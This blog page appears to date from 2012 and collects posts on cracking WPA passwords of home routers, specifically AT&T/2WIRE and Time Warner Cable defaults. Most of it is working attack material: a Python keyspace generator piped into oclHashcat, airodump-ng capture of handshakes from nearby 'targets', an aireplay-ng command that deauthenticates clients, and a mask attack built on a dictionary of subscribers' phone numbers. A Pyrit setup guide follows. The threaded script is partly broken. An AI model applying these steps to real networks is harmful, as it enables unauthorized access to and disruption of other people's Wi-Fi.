Showing posts with label WPA. Show all posts
Showing posts with label WPA. Show all posts

UPDATE: Cracking 2WIRE WPA1/2

Tuesday, October 23, 2012 Posted by Unknown 0 comments

My previous post had a few problems with the script. Then I had updated the script to work properly. http://pastie.org/5101804  However, it was still way to slow. Asked around and found the following solution.  

http://pastie.org/5104479



#Python 3
#Name: 2wire.py
#by: INIT_6
#Count from 0000000000 - 9999999999 skipping any numbers that repeat them selfs more then 3 times like 333

import sys
from threading import Thread

def count1(first, ver):
    MAX_INT = 999000000
    BAD_PATTERNS = {x * 3 for x in '0123456789'}
    # Use xrange for Python 2.7
    for number in range(MAX_INT):
        int_string = str(number).rjust(9, '0')
        if any(pattern in int_string for pattern in BAD_PATTERNS):
            continue
        print ( str(first) + str(number).rjust(9, '0') )

if __name__ == '__main__':
    for x in '0123456789':
        try:
            Thread(target=count1, args=(x,1)).start()
    
        except: # Exception, errtxt:
           print ( errtxt )


Still have some work. I need to test the threading better and set up a queue so it will only start as many threads as the computer can handle.
Labels: , , , , , , ,

Part 2. Cracking AT&T WPA1/2

Monday, September 24, 2012 Posted by Unknown 0 comments

Part 2. Cracking AT&T WPA1/2 with python script and hashcat.

Once you get the four way handshake from part 1.

My python script can be found here. It creates a CPU pool based on how many cores you have. Based on python 2.7.3 and Linux OS.

What the script does is count from 000000000 to 9999999999 skipping any number that has three repeating numbers in a row.  so you wont have keys like 1234555678 because it repeats 5 three times. This is because AT&T decided to make their numbers to random cutting their key space down. Its faster to count through and skip past repeating numbers then to process each number.

To change what the programs start on open it and change the following line to whatever you want:

start = str(7)

To run the program pipe it to hashcat-plus.

python 2wireWPAiter.py | ./oclHashcat-plus64.bin -m 2500 -a 0 --gpu-accel=160 --gpu-loops=1024 ../dir/2WIREHandShake.hccap
With a AMD driver 12.8 and SDK 2.7 I get about 86K keys  per second. With the built in brute-force I get 114K keys per second. Still working on how to improve my out put speed. 

To get more info on hashcat look here.

straight brute force on known key starting with 7 saved over an hour.

Screen shots.. With script                without script 


Someone in the hashcat room just told me a better way of doing this to make it even faster and more accurate. using http://hashcat.net/wiki/doku.php?id=statsprocessor making a hcstat file. Utilizing Markov chains. I will do this later tonight and post my results.

Edit: you can't use Markov chains with hashcat for this. 
Labels: , , , ,

PART 1: Cracking AT&T WPA1/2

Posted by Unknown 0 comments
Part 1. Getting the handshake.

Aircrack's site has a pretty good tutorial.

Boot from Back Track 5 R3

First you want to see what kind of wifi connection you have to choose from. Start your wireless interface in monitor mode.

#airmon-zc start wlan0
#airodump-ng --encrypt wpa mon0 

You should see several AP. Record the BSSID and Channel along with any associated clients shown at the bottom of airodump-ng.

Once you find a couple targets on the same channel. You need to close airodump and stop airmon

#airmon-zc stop mon0

Start airmon-zc on the channel of the target.

#airmon-zc start wlan0 <Channel Number>

Then start airodump on the same channel along with some other options.

#airodump-ng mon0 --encrypt wpa --write FILENAME --output-format pcap -a --channel <Channel number>

 Channel number need to be the same as your target to so you can get the full four way handshake between the client and the AP.  Airodump should show in the top right hand corner once you get a handshake.

Instead of waiting around for a client to connect you can deauthenticate a client and wait for it to auto reconnect.

#aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0


Where:
  • -0 means deauthentication
  • 5 is the number of deauths to send
  • -a 00:14:6C:7E:40:80 is the MAC address of the access point
  • -c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are deauthing
  • mon0 is the interface name

If you are using backtrack you can easily check your .pcap file to see if it has a proper handshake by using pyrit. or you can load up wireshark and run a filter for EAPOL what I will show in a future post.

#pyrit -r FILENAME.pcap analyze 

The output should tell you if you have good EAPOL handshake or workable or nothing at all if none are found.

To strip out all the crap out of your pcap file expect for your handshakes run the following:

 #pyrit -r FILENAME.pcap -o OUTPUT.pcap strip

To turn your pcap file into a hashcat-plus friendly file you can upload it to https://hashcat.net/cap2hccap/ or use the steps they tell you to convert it your self. I just use their site.


Labels: , , ,

Cracking Time Warner Cable Default WPA

Tuesday, June 26, 2012 Posted by Unknown 0 comments
In the Texas area I have noticed that all Time Warner Cable wireless access points are setup with the home owners home phone number. 


When I say all I really mean the 3 I have ran across but close enough for me. 


Using http://www.telcodata.us/ collected data for all phone numbers in Texas that belong to Time Warner. Cleaned the file up using a quick and dirty python program. TimeWarnerNum.dict 


First you need to collect the 4-way handshake.


Using oclHashCat-Plus to crack the WPA1/2 password. This is optimized for my AMD graphics card you can change the settings for your card. 


./oclHashcat-plus -m 2500 capture.hccap -a 6 -o TimeWarnerNum.dict ?d?d?d?d --output-format=6 --gpu-accel=32 --gpu-loops=256 --perm-min=10 --perm-max=10


This will append every possible digit to all the numbers Time Warner own. Because they own subset numbers like 972-966-7 if you don't set the min and max to 10 you will create 11 digit numbers.
Labels: , ,

HACKING WPA w/ PYRIT

Monday, June 25, 2012 Posted by Unknown 0 comments
Getting Pyrit to work with OpenCL and posgreSQL database. On Kubuntu 12.04 With a AMD Radon HD 7950 card.


You have to install AMD catalysis drivers and the AMD SDK. Make sure you install whatever one is older first then the newer one so you don't corrupt your install. This will change as they update the catalysis drivers and the SDK at different times. 


Go AMD and download and install the drivers for your card. here  
This page will help you install your drivers. here


Restart after install.


Download the latest SDK. here
This page will help you install your SDK. here


Restart after install.


name@box$: env


Check and make sure you have the following:


AMDAPPSDKROOT =/opt/AMDAPP/
LD_LIBRARY_PATH=/opt/AMDAPP/lib


Make sure everything is running correctly and the protocol is running by:
This has to be ran as a normal user. Application doesn't work as root.
name@box$: fglrxinfo




Some decencies that I ran into. This list my not be complete. 

apt-get install cmake libroot-python-dev libboost1.40-all-dev subversion libpcap-dev libssl-dev python-dev zlib1g-dev python-scapy libpcap0.8-dev libpq-dev 


install easy_install fuction. Follow the steps here
Now you can run:


name@box$: sudo easy_install SQLAlchemy
name@box$: sudo easy_install psycopg2



Now we are ready to install pyrit.


name@box$: wget https://pyrit.googlecode.com/files/pyrit-0.4.0.tar.gz
name@box$: wget https://pyrit.googlecode.com/files/cpyrit-opencl-0.4.0.tar.gz


name@box$ tar xvzf pyrit-0.4.0.tar.gz
name@box$ tar xvzf cpyrit-opencl-0.4.0.tar.gz


name@box$ cd pyrit-0.4.0
name@box$ sudo python setup.py build
name@box$ sudo python setup.py install


name@box$ cd ../cpyrit-opencl-0.4.0
name@box$ nano setup.py


You need to edit the setup.py file to match the below:




LIBRARIES.append('OpenCL') 
try: if os.path.exists(os.environ['AMDAPPSDKROOT']): OPENCL_INC_DIRS.append(os.path.join(os.environ['AMDAPPSDKROOT'], 'include')) 
    for path in ('lib/x86_64','lib/x86'): 
         if       os.path.exists(os.path.join(os.environ['AMDAPPSDKROOT'], path)):  OPENCL_LIB_DIRS.append(os.path.join(os.environ['AMDAPPSDKROOT'], path)) break except: pass for path in ('/opt/AMDAPP/include', \ '/opt/AMDAPP/include/CL'):


ctrl+o to save
ctrl+x to exit


name@box$ sudo python setup.py build
name@box$ sudo python setup.py install




install postgresql 9 from website
install pgadmin3 from ubuntu software center.


Setup new user and database. 
User:2wire 
password: putitinme  
Database: 2wireDB


To have pyrit connect to your database do the following
name@box$ pyrit -u postgresql://2wire:putitinme@127.0.0.1/2wireDB [pyrit command]


Now if you don't want to type out all that non-sense each time edit the following file:


name@box$ nano ~./pyrit/config


Change where it says file:// to read postgresql://2wire:putitinme@127.0.0.1/2wireDB


Ctrl+o to save
Ctrl+x to exit


now you can simply run pyrit


name@box$ pyrit [pyrit command]


Now it will automatically connect to the database. 


Might have left out a few steps if you run across this page and need some help feel free to hit me up. I know pages just like this helped me install pyrit.

Labels: , , , , ,
Subscribe to: Posts (Atom)